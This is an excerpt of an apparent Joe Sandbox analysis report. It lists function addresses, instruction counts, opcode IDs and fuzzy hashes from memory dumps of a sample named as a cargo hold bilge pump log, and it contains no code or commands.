Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad2a10047eed8fe410fc0d731df1744ab40f09f3eca5c222881502fe23ac982
Instruction ID: e51b084b4ace53a37d830da0b569fb2719906a0da6fa9eafea1b0e346e802295
Opcode Fuzzy Hash: 0ad2a10047eed8fe410fc0d731df1744ab40f09f3eca5c222881502fe23ac982
Instruction Fuzzy Hash: 41314871B002129FDB10AB39980035EBBE6BFC9210F14467AD55AEB3D1EF35C84AC791

Uniqueness

Uniqueness Score: -1.00%

Function 05C7BA08 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 976384f773abe91cd784cc9964a229c14a75abf7255d21c31d6c9bc4be20fce7
Instruction ID: aa7fac6266b4145749837c6ca476193a1b4e584cd2b60f36ac7bdd0a6c4530cc
Opcode Fuzzy Hash: 976384f773abe91cd784cc9964a229c14a75abf7255d21c31d6c9bc4be20fce7
Instruction Fuzzy Hash: D621C53530420C4B8B15763A992463E36EBEFC8669718486AE907C7B99FE64CD42C792

Uniqueness

Uniqueness Score: -1.00%

Function 02529990 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720a927759601dbfd7ac92fa33beb17bc0c1b0daf02bcce56bbb7bafbd27d249
Instruction ID: 784b1713e5687a577a40248a215bf3a312d074d750dbb63680937fe7e4b4ce64
Opcode Fuzzy Hash: 720a927759601dbfd7ac92fa33beb17bc0c1b0daf02bcce56bbb7bafbd27d249
Instruction Fuzzy Hash: 0321E2327043224BDB151735989463EAFAABFC6608F24446AD406CB3D1EB29CC86D395

Uniqueness

Uniqueness Score: -1.00%

Function 025299A0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3200fe731ff18448c405fad03cfc8e13d4fb154b2ee3362700a010480c5b2d1f
Instruction ID: 89c7e061d3a5398470ae4058a130a94469bffc6cf0229abc5f34e98ec7e5c995
Opcode Fuzzy Hash: 3200fe731ff18448c405fad03cfc8e13d4fb154b2ee3362700a010480c5b2d1f
Instruction Fuzzy Hash: 7E21B33130432247EB141725D49477EBA9BBFC6A18F244439D506CB3D4EF29CC86D399

Uniqueness

Uniqueness Score: -1.00%

Function 05C7BA18 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83eee2187a0b86f24a12ec302730ea0a69cc16f0acdd4133587c3e7a646577ee
Instruction ID: 9156506286d260dce4288a598ec5d4cd9a2dd048976c097c583ef6cff21fa254
Opcode Fuzzy Hash: 83eee2187a0b86f24a12ec302730ea0a69cc16f0acdd4133587c3e7a646577ee
Instruction Fuzzy Hash: D921A13474460C8B8B157779992853F36DBEFC86653184829D907CBB98FF34CD468792

Uniqueness

Uniqueness Score: -1.00%

Function 05C7897F Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc29f5275fa68fa1d6139d51add249fe7c9aa5dc1c495b223ba0ece890fe77cb
Instruction ID: a5fb0483571e0a40781a1576b39b7b767c9e9b836e81229c52c59cf78a99628e
Opcode Fuzzy Hash: dc29f5275fa68fa1d6139d51add249fe7c9aa5dc1c495b223ba0ece890fe77cb
Instruction Fuzzy Hash: 5B2183347006088FC724EF39D98892AB7F6EF88714B20897CD4169B761DB75ED06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05C7B6D5 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 385c4ac0dac4ad14eae4799403e9bf1a2cfdb985f2a78478192e36047264d59a
Instruction ID: f484e68d8234a857deaaf9836c576d768648e95b9430a7ca4c1d44a825957446
Opcode Fuzzy Hash: 385c4ac0dac4ad14eae4799403e9bf1a2cfdb985f2a78478192e36047264d59a
Instruction Fuzzy Hash: 8B31CC357002088FCB14DF64D554AADBBF2FF88315F1588A8D506AB7A4EB35DD85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05C7AD20 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 577f1bc60f5335518f85b16f92f010052cfef7898b6dd039005356549af32216
Instruction ID: 4092d0dc47ec8910a1845314dcfd3d58f36d71e4c06264f8ad8937d0bcd49be3
Opcode Fuzzy Hash: 577f1bc60f5335518f85b16f92f010052cfef7898b6dd039005356549af32216
Instruction Fuzzy Hash: C2312A302506058FC764DB28C848BA677E6FF85315F558969E15ECB3A1DF71EC8ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 025271D8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bda23ccc8746d6c402af26ba82fe1925f1cf2615821b828b26111f1daf31ffe
Instruction ID: 07078b3378a7f601397d66af1089ffc249986397fb9fb98f5e34c963f7373f86
Opcode Fuzzy Hash: 4bda23ccc8746d6c402af26ba82fe1925f1cf2615821b828b26111f1daf31ffe
Instruction Fuzzy Hash: 6C2120313006218BC729DB6AE498A2AFBA6FFCE7547044069E906CB3D4CF20DC06C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043687280.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1d000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6055e0324cc59068f152bfdc904b91de1597a24d8f8b9bd5548562366224d285
Instruction ID: eea40d4a0584a79a5928fc7e7e894db8e7dd54649a73daf1e1f2fcf5052c6711
Opcode Fuzzy Hash: 6055e0324cc59068f152bfdc904b91de1597a24d8f8b9bd5548562366224d285
Instruction Fuzzy Hash: 9C212671504200EFDB05DF14D9C0BA6BBB5FB94314F34C66DE8494F296C33AD886CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043687280.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1d000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b781eeaf8369ba7ef7cde2507dc5ddff339a80d2b07f0aa0a87d5108f017e6c
Instruction ID: 45c64f429e6f4ae2d2b6132cc48b1fa6dc318399da97428a177a9edd78abba04
Opcode Fuzzy Hash: 2b781eeaf8369ba7ef7cde2507dc5ddff339a80d2b07f0aa0a87d5108f017e6c
Instruction Fuzzy Hash: 23210475604200EFCB14DF14D9C4B66BFA5FB88314F24C56DD80A4B296C33BD887CA61

Uniqueness

Uniqueness Score: -1.00%

Function 05C7B2C3 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fab815dff08a4ed5b781e1f91ba10593a7bc31608146be0a13ba38976a7d0d2
Instruction ID: 57e5650385bd14f834f94f2ec580218fff8383e63095f8bc6c3e61229b422254
Opcode Fuzzy Hash: 2fab815dff08a4ed5b781e1f91ba10593a7bc31608146be0a13ba38976a7d0d2
Instruction Fuzzy Hash: 3A310A352506048FC754DF28C849BA577E6FF85315F158869E18ECB3A1DF75AC86CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0252E090 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a75c32530cc92948ebfb85888fe4a5f178efad84aeb1641e66b97f2a8ce0c2
Instruction ID: fa1c3e332f931086c88279bdbb52716e03c1ec3ead4364df9f06345e717edf81
Opcode Fuzzy Hash: 11a75c32530cc92948ebfb85888fe4a5f178efad84aeb1641e66b97f2a8ce0c2
Instruction Fuzzy Hash: 2A219232A007569BDF00AF68D4503D6B372FFD9324F158275D9487B3C6DB7169868790

Uniqueness

Uniqueness Score: -1.00%

Function 0252D83C Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896522a62e6adda8694be28d5837ede96d95b089461c4600bf5e354bbf370f5b
Instruction ID: a86436f691cc55a139ff7156844860aa18ebb512f351463a8c98eb0eb6db7772
Opcode Fuzzy Hash: 896522a62e6adda8694be28d5837ede96d95b089461c4600bf5e354bbf370f5b
Instruction Fuzzy Hash: 9B218032A1071A87DF00AF68D850396B376FFC9320F108675D9487B3C5DB7169858794

Uniqueness

Uniqueness Score: -1.00%

Function 05C77D74 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0d09a8faac2f4b6d9280836e3356b78cbb2b118a65b3937493dbc6278119b94
Instruction ID: 36325b0169270747f9340c48ebbf722e9d88b4b0cd16b92adc3b50b3255bdef3
Opcode Fuzzy Hash: d0d09a8faac2f4b6d9280836e3356b78cbb2b118a65b3937493dbc6278119b94
Instruction Fuzzy Hash: 0B119031304608CFCB24EF39D99482EBBB6FF96216718496AE046DB670DA32DD85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 025271C7 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a364f24869570ba7ad59586569ffad3dcfa7323dcb9f88444dfc1d3e8e4b7755
Instruction ID: e2d694673bb09aaee65adc10b46e2c2226943bf7fb9746f4fe2bd6b2db3af5ee
Opcode Fuzzy Hash: a364f24869570ba7ad59586569ffad3dcfa7323dcb9f88444dfc1d3e8e4b7755
Instruction Fuzzy Hash: 5211E7317006229BC719DB6AD49862AFFA6FFC97547054069E906DB3E0CF20DC068794

Uniqueness

Uniqueness Score: -1.00%

Function 05C74198 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231ef15a771950051710bc45c6327a929ebe8e95bbd783b6102197d5772e34f7
Instruction ID: a705f6f1facd3f88958801f2f0732e3407cdcc4f2f1c099be2a4731391a7cf23
Opcode Fuzzy Hash: 231ef15a771950051710bc45c6327a929ebe8e95bbd783b6102197d5772e34f7
Instruction Fuzzy Hash: 7B11E3343043089FDB29DA69D890B3ABBDBFBC5314F14C869E4468B694CBB5DD46C790

Uniqueness

Uniqueness Score: -1.00%

Function 02526C70 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2597825f2278b1502ae37003762ca95eac48adc613c38137bfc057a6ffd466c7
Instruction ID: 0d2529a072d22dcb8dabc34582441126d6c22c5dae0f15390880e92628be8e1b
Opcode Fuzzy Hash: 2597825f2278b1502ae37003762ca95eac48adc613c38137bfc057a6ffd466c7
Instruction Fuzzy Hash: 6511BF31A002289FDB14DE29D14875ABFBAFB85721F148425E909DB3C0DB70DC49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043687280.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1d000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f2a4e2423c1d9bb38dd46447dbbc4e85e9aba742387b84e0a1d66e1c5fb6ba
Instruction ID: 53e7c314b832f233340dc367907f6f55279a04710e9d1024d943a58975f20cdd
Opcode Fuzzy Hash: f1f2a4e2423c1d9bb38dd46447dbbc4e85e9aba742387b84e0a1d66e1c5fb6ba
Instruction Fuzzy Hash: 05219F755093808FCB02CF24D994B15BF71EB49314F28C5DAD8498B2A7C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 05C741A8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b322297262c607f920878ddb8a1e84758a2a756b9a599d48b8d82404e7982e
Instruction ID: 4a6def7b529516db1028e6ca8a24d27e7e1f261b023abdb4f90d9250a27aefa6
Opcode Fuzzy Hash: 69b322297262c607f920878ddb8a1e84758a2a756b9a599d48b8d82404e7982e
Instruction Fuzzy Hash: 5911C2343043089FDB29DA69C890B7AB7EBFBC4314F54C829E4068B684CB71ED468790

Uniqueness

Uniqueness Score: -1.00%

Function 025245D8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ffe088d68172f0938e32f225787b7d7b160e286afc2f1cd85eb76a660d47721
Instruction ID: 509f72690bc4b09e0635d6f30d9aa3dbcddf455eb61b661618fcdd2517b81e1e
Opcode Fuzzy Hash: 1ffe088d68172f0938e32f225787b7d7b160e286afc2f1cd85eb76a660d47721
Instruction Fuzzy Hash: 0B016833E000250BCF106A79AC402DEBB6AFBCA651F050134C81CEB3C5EB38991F4AD5

Uniqueness

Uniqueness Score: -1.00%

Function 0252A638 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38991bde0d7acc5a9330e3c717b353326a77e64da02eb12c9f1b1b029850269a
Instruction ID: 6ec78a112c63f5f8305aebfbb321fe72fdfe0d4a23a910de4c560e12e282c0d3
Opcode Fuzzy Hash: 38991bde0d7acc5a9330e3c717b353326a77e64da02eb12c9f1b1b029850269a
Instruction Fuzzy Hash: 3B118235B00218DFCB149F65D854B9EBBBAFB8C710F14812AE906E7390DB71AC10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 025245E8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6269b19b0026a876e37bb5226a3950d1017da100f97d5753c8e357aa449b0788
Instruction ID: 4c6964652a5022b8088cdc7fccd2e5aef73a5bfc5440b41a77db4d96753b3fc6
Opcode Fuzzy Hash: 6269b19b0026a876e37bb5226a3950d1017da100f97d5753c8e357aa449b0788
Instruction Fuzzy Hash: BD110832A005348BCF105B79DC1839E7BAAFBC9751F054165D905DB3D4DF389C0A8AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0252B1C0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcc82f95b0e1ebd268c964fd9c485d3058e9eeae796c40dd7238cb853bf20aae
Instruction ID: 98ff7c8035c3249a0af2460e50ac9c6fe52a9f3581945acdffeb50452c997471
Opcode Fuzzy Hash: dcc82f95b0e1ebd268c964fd9c485d3058e9eeae796c40dd7238cb853bf20aae
Instruction Fuzzy Hash: 71118F316042699FCB14EF68E944BAEBFB5FB89318F044129F905872D5C734C965CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05C70351 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f20cfc400a17191c3184e5a65a5e42f106e2a31ec0c10c53614a97d15355599
Instruction ID: ad90994018a754a00af7121140f39f33f5a5b90ee0f1dd78660c583bf71bb02d
Opcode Fuzzy Hash: 6f20cfc400a17191c3184e5a65a5e42f106e2a31ec0c10c53614a97d15355599
Instruction Fuzzy Hash: 7D119A71A106099FDB05CF69D888BAEBBF4FF48700F048429E919E7250DB74DA10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05C7AC67 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9be3b915946c30fc7b116bb584784cfb0cdfb25c82ae80fbe2dcb860486744e
Instruction ID: 9ed68633d5e59def696449dbe5a4a02ab6f71d441d2d6d41a16b50e77df66a60
Opcode Fuzzy Hash: d9be3b915946c30fc7b116bb584784cfb0cdfb25c82ae80fbe2dcb860486744e
Instruction Fuzzy Hash: FD11E132304608CFC7249F39D844D2E7BB6FF85255B1804A9E00ACB671DA32DD45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043687280.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a1d000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 2ca15c785c415407043fe16553466e46c2d4698e82e41f7b2832dd53c48e7882
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 7511BB75504280DFCB02CF14C5C4B95BBA1FB84314F28C6AAD8494B696C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0252B1D0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e0c9b738e513dc0d81896a71043c2dafeec3693452bcc13d3f5de06c6276a6
Instruction ID: e528d6214379f08591219b510111b057586a7ceef1d698c54e6c86214e6c28ab
Opcode Fuzzy Hash: a3e0c9b738e513dc0d81896a71043c2dafeec3693452bcc13d3f5de06c6276a6
Instruction Fuzzy Hash: 2A115A316002299FCB14AF58E844B6EBFB5FB49318F004029FD059B2D5CB34D968CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C70360 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cbce2b743bcf58cf18d9452ac19ca768c771af1273ce396c5d9182d85d7eb97
Instruction ID: db8c9da2b63624efa79b7d303c1e89dc8ce6576f309d6905a1420703ff715772
Opcode Fuzzy Hash: 7cbce2b743bcf58cf18d9452ac19ca768c771af1273ce396c5d9182d85d7eb97
Instruction Fuzzy Hash: F7115E716106099FDF15DF69C888AAEBBF5FF48610F008429E919D7650D774DA10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05C7D248 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1761403432b1e3a8fd97a357df89297c858d1db05d872b9ee240ab5e4f29ac7
Instruction ID: 533f87123dbc45292db414f040f51567493ec299ac58e211dc87884ec4d2e35b
Opcode Fuzzy Hash: e1761403432b1e3a8fd97a357df89297c858d1db05d872b9ee240ab5e4f29ac7
Instruction Fuzzy Hash: D9017C353402084F8A45BB6D842893E36DBEFC9660B1944A5EA07CB3A8EE21CC438792

Uniqueness

Uniqueness Score: -1.00%

Function 05C7D220 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2207a0e5b018669cb80c7ca98706dae8a41464d70c62ec74d5a5f9e4021c16
Instruction ID: 7d25b3e657f465a23d812ef2f943c73736037199e356f7dd81e2a7a5ecff5ac9
Opcode Fuzzy Hash: 0d2207a0e5b018669cb80c7ca98706dae8a41464d70c62ec74d5a5f9e4021c16
Instruction Fuzzy Hash: DA01B5353143084FC705AB7DD418A2A3BE6FFCA220B1941AAE542CB3B5DF64CC4287A1

Uniqueness

Uniqueness Score: -1.00%

Function 05C74008 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f76d59432bb166cc1b97243a57bb2f8c56c7d4aedc2d5f0bd0c23c3899851e5
Instruction ID: 8575508e17a29955a3aa1852aac8257fd915a7500bca0964a7407ca8e21f2aad
Opcode Fuzzy Hash: 7f76d59432bb166cc1b97243a57bb2f8c56c7d4aedc2d5f0bd0c23c3899851e5
Instruction Fuzzy Hash: 0101D43290A62ABBCF2DCF19D180665FFA8BF44710B094A1AD41953E40C771FA90C7E7

Uniqueness

Uniqueness Score: -1.00%

Function 05C77209 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9e6cb78b4e09e5083a2434cde72b2b44bebc2c8692a1252c1980a97ba5881b9
Instruction ID: 23fda0e9da9521a30f36680c14e0f180d7e633df493d70e88153452f7f703cce
Opcode Fuzzy Hash: a9e6cb78b4e09e5083a2434cde72b2b44bebc2c8692a1252c1980a97ba5881b9
Instruction Fuzzy Hash: 2E115431204B414FD724DF29E414307BBE1EB85325F108B5DD0AA877E4DF75A4458B90

Uniqueness

Uniqueness Score: -1.00%

Function 0252B2D8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

